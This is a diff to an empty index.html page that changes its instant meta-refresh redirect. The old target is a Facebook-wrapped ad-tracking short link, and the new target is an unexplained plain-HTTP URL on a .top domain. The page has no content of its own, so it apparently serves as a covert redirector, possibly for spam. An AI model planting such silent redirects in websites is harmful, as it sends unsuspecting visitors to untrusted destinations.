--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <meta http-equiv="refresh" content="0;url=https://lm.facebook.com/l.php?u=https%3A%2F%2Flihi.cc%2FILzk9%3Futm_medium%3Dpaid%26utm_source%3Dfb%26utm_id%3D120223994956210190%26utm_content%3D120223998040170190%26utm_term%3D120223998040380190%26utm_campaign%3D120223994956210190%26fbclid%3DIwZXh0bgNhZW&h=AT0nxJSZaRun7MlPPW-U2aPHzkXlcFZlRvfhJBCpR75d_U5Kkl9enL4Qp8_isPXB8Z9yyGEFCs7Qv7kOnan-d6716kqlwixddRk_NQ0TPEIycK6VCvuLFU-daeuPMLUr9UfVcgOoIoXvVjNX">
+  <meta http-equiv="refresh" content="0;url=http://asgels.top/femalefe">
 </head>
 <body></body>
 </html>
